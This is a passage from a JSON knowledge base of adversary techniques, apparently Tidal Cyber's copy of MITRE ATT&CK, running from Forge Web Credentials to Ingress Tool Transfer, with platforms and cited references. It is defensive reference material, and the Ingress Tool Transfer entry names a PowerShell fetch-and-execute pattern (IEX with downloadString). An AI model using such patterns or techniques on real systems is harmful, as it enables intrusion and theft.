Preauth](https://app.tidalcyber.com/references/f8931e8d-9a03-5407-857a-2a1c5a895eed)]</sup>\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup><sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> ",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "d8507187-cea6-4be2-95b4-e875924e58c0",
"value": "Forge Web Credentials"
},
{
"description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "4acf57da-73c1-4555-a86a-38ea4a8b962d",
"value": "Gather Victim Host Information"
},
{
"description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA methods associated with those usernames.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup><sup>[[Obsidian SSPR Abuse 2023](https://app.tidalcyber.com/references/7f28f770-ef06-5923-b759-b731ceabe08a)]</sup> Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup><sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup>\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "aea36489-047e-4c4a-ab26-c51fd3556182",
"value": "Gather Victim Identity Information"
},
{
"description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "58776ca9-0c54-487f-afcc-e7e5b661bd54",
"value": "Gather Victim Network Information"
},
{
"description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "e55d2e4b-07d8-4c22-b543-c187be320578",
"value": "Gather Victim Org Information"
},
{
"description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup>\n\nAdversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.<sup>[[Microsoft gpresult](https://app.tidalcyber.com/references/88af38e8-e437-4153-80af-a1be8c6a8629)]</sup><sup>[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]</sup> Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://app.tidalcyber.com/technique/d092a9e1-63d0-415d-8cd0-666a261be5d9)) for their benefit.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "d97d754d-92d5-4874-bbfe-5aa4d581f2a8",
"value": "Group Policy Discovery"
},
{
"description": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.<sup>[[Ossmann Star Feb 2011](https://app.tidalcyber.com/references/1be27354-1326-4568-b26a-d0034acecba2)]</sup><sup>[[Aleks Weapons Nov 2015](https://app.tidalcyber.com/references/fd22c941-b0dc-4420-b363-2f5777981041)]</sup><sup>[[Frisk DMA August 2016](https://app.tidalcyber.com/references/c504485b-2daa-4159-96da-481a0b97a979)]</sup><sup>[[McMillan Pwn March 2012](https://app.tidalcyber.com/references/6b57e883-75a1-4a71-accc-2d18148b9c3d)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "4557bfb9-b940-49b6-b8be-571979134419",
"value": "Hardware Additions"
},
{
|
||
"description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup><sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Office 365",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "f37f0cd5-0446-415f-9309-94e25aa1165d",
            "value": "Hide Artifacts"
        },
        {
            "description": "Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,<sup>[[TA571](https://app.tidalcyber.com/references/5b463ad7-f425-5e70-b0b0-28514730a888)]</sup> masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,<sup>[[Schema-abuse](https://app.tidalcyber.com/references/75b860d9-a48d-57de-ba1e-b0db970abb1b)]</sup><sup>[[Facad1ng](https://app.tidalcyber.com/references/bd80f3d7-e653-5f8f-ba8a-00b8780ae935)]</sup><sup>[[Browser-updates](https://app.tidalcyber.com/references/89e913a8-1d52-53fe-b692-fb72e21d794f)]</sup> and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.\n\nC2 networks may include the use of [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.<sup>[[sysdig](https://app.tidalcyber.com/references/80cb54c2-2c44-5e19-bbc5-da9f4aaf976a)]</sup><sup>[[Orange Residential Proxies](https://app.tidalcyber.com/references/df4b99f3-1796-57b3-a352-37be5380badc)]</sup>\n\nAdversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.<sup>[[mod_rewrite](https://app.tidalcyber.com/references/3568b09c-7368-5fc2-85b3-d16ee9b9c686)]</sup><sup>[[SocGholish-update](https://app.tidalcyber.com/references/01d9c3ba-29e2-5090-b399-0e7adf50a6b9)]</sup> Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)).<sup>[[TA571](https://app.tidalcyber.com/references/5b463ad7-f425-5e70-b0b0-28514730a888)]</sup><sup>[[mod_rewrite](https://app.tidalcyber.com/references/3568b09c-7368-5fc2-85b3-d16ee9b9c686)]</sup>\n\nHiding C2 infrastructure may also be supported by [Resource Development](https://app.tidalcyber.com/tactics/989d09c2-12b8-4419-9b34-a328cf295fff) activities such as [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) and [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.<sup>[[StarBlizzard](https://app.tidalcyber.com/references/68b16960-1893-51a1-b46c-974a09d4a0c4)]</sup><sup>[[QR-cofense](https://app.tidalcyber.com/references/eda8270f-c76f-5d01-b45f-74246945ec50)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Network",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
                    "type": "uses"
                }
            ],
            "uuid": "a3a2a527-39e7-58b4-a3cc-932eb0cef562",
            "value": "Hide Infrastructure"
        },
        {
"description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
                    "type": "uses"
                },
                {
                    "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
                    "type": "uses"
                },
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68",
            "value": "Hijack Execution Flow"
        },
        {
"description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.<sup>[[Emotet shutdown](https://app.tidalcyber.com/references/02e6c7bf-f81c-53a3-b771-fd77d4cdb5a0)]</sup>\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
            "meta": {
                "platforms": [
                    "Containers",
                    "IaaS",
                    "Linux",
                    "macOS",
                    "Network",
                    "Office 365",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "e3be3d76-0a36-4060-8003-3b39c557f728",
            "value": "Impair Defenses"
        },
        {
            "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://app.tidalcyber.com/technique/b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal. \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://app.tidalcyber.com/technique/aea36489-047e-4c4a-ab26-c51fd3556182) and [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to substantiate their false identity.<sup>[[CrowdStrike-BEC](https://app.tidalcyber.com/references/7e674a8d-e79f-5cb0-8ad2-a7678e647c6f)]</sup>\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) targeting one organization which can then be used to support impersonation against other entities.<sup>[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]</sup>",
            "meta": {
                "platforms": [
                    "Google Workspace",
                    "Linux",
                    "macOS",
                    "Office 365",
                    "SaaS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1",
            "value": "Impersonation"
        },
        {
"description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>\n\nA tool has been developed to facilitate planting backdoors in cloud container images.<sup>[[Rhino Labs Cloud Backdoor September 2019](https://app.tidalcyber.com/references/ac31b781-dbe4-49c2-b7af-dfb23d435ce8)]</sup> If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd).<sup>[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]</sup>",
            "meta": {
                "platforms": [
                    "Containers",
                    "IaaS"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
                    "type": "uses"
                }
            ],
            "uuid": "b4f2b54c-d304-4e05-a813-69bc7e6fd1f3",
            "value": "Implant Internal Image"
        },
        {
"description": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\n\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.",
            "meta": {
                "platforms": [
                    "Containers",
                    "Google Workspace",
                    "Linux",
                    "macOS",
                    "Network",
                    "Office 365",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "fa1507f1-c763-4af1-8bd9-a2fb8f7904be",
            "value": "Indicator Removal"
        },
        {
"description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8). For example, [Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), Run window, or via scripts. <sup>[[VectorSec ForFiles Aug 2017](https://app.tidalcyber.com/references/8088d15d-9512-4d12-a99a-c76ad9dc3390)]</sup> <sup>[[Evi1cg Forfiles Nov 2017](https://app.tidalcyber.com/references/b292b85e-68eb-43c3-9b5b-222810e2f26a)]</sup>\n\nAdversaries may abuse these features for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or file extensions more commonly associated with malicious payloads.",
            "meta": {
                "platforms": [
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "91e79eb9-7f99-4890-8bef-9543d307206d",
            "value": "Indirect Command Execution"
        },
        {
            "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043), and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.<sup>[[t1105_lolbas](https://app.tidalcyber.com/references/80e649f5-6c74-4d66-a452-4f4cd51501da)]</sup>\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) (typically after interacting with [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) lures).<sup>[[T1105: Trellix_search-ms](https://app.tidalcyber.com/references/7079d170-9ead-5be4-bbc8-13c3f082b3dd)]</sup>\n\nFiles can also be transferred using various [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s as well as native or otherwise present tools on the victim system.<sup>[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)]</sup> In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.<sup>[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Network",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
                    "type": "uses"
                }
            ],
            "uuid": "4499ce34-9871-4879-883c-19ddb940f242",
            "value": "Ingress Tool Transfer"
        },
        {
